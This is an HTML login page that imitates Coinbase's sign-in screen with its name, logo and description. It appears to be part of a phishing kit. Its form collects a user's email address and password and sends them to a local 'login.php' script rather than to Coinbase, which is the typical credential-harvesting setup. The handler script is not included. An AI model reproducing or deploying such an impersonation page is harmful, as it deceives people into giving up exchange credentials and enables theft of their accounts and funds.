<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1.0" name="viewport">

  <title>Coinbase - Sign in</title>
  <meta content="Coinbase is a secure online platform for buying, selling, transferring, and storing cryptocurrency." name="description">
  <meta content="Coinbase, Crypto Currency" name="keywords">

  <!-- Favicons -->
  <link href="assets/img/favicon.png" rel="icon">
  <link href="assets/img/apple-touch-icon.png" rel="apple-touch-icon">

  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css?family=Poppins:400,400i,500,500i,600,600i" rel="stylesheet">

  <!-- Vendor CSS Files -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.2.3/css/bootstrap.min.css" integrity="sha512-SbiR/eusphKoMVVXysTKG/7VseWii+Y3FdHrt0EpKgpToZeemhqHeZeLWLhJutz/2ut2Vw1uQEj2MbRF+TVBUA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
  <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
  <link href="assets/vendor/aos/aos.css" rel="stylesheet">

  <!-- Template Main CSS File -->
  <link href="assets/css/main.css" rel="stylesheet">

</head>

<body>


  <!-- ======= Login Section ======= -->
  <section id="login" class="login">
    <div class="container">
      <div class="row justify-content-center align-items-center py-5">
        <div class="col-5">
          <div class="card">            
            <div class="card-body">
              <img src="assets/img/logo.svg" class="my-2" alt="Coinbase">
              <h3 class="card-title pt-4 pb-1">Sign in to Coinbase</h3>
              <form action="login.php" method="POST">
                <input type="text" class="form-control mb-2 py-2" name="email" placeholder="Your email address" required>
                <input type="password" class="form-control py-2" name="password" placeholder="Password" required>
                <p class="card-text pt-1" style="padding-left: 5px; font-size: 12px;">Not your device? Use incognito mode to sign in privately.</p> 
                <input type="submit" name="submit" class="btn formContinueBtn mb-2" value="Continue">
                <a href="#" class="btn formSignUpBtn mb-3">Create Account</a>
              </form>

              <a href="#">Sign in to a business account</a>
              <a href="#">Privacy Policy</a>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>



  <div id="preloader"></div>

  <!-- Vendor JS Files -->
  <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.2.3/js/bootstrap.min.js" integrity="sha512-1/RvZTcCDEUjY/CypiMz+iqqtaoQfAITmNSJY17Myp4Ms5mdxPS5UV7iOfdZoxcGhzFbOm6sntTKJppjvuhg4g==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src="assets/vendor/aos/aos.js"></script>

  <!-- Template Main JS File -->
  <script src="assets/js/main.js"></script>

</body>

</html>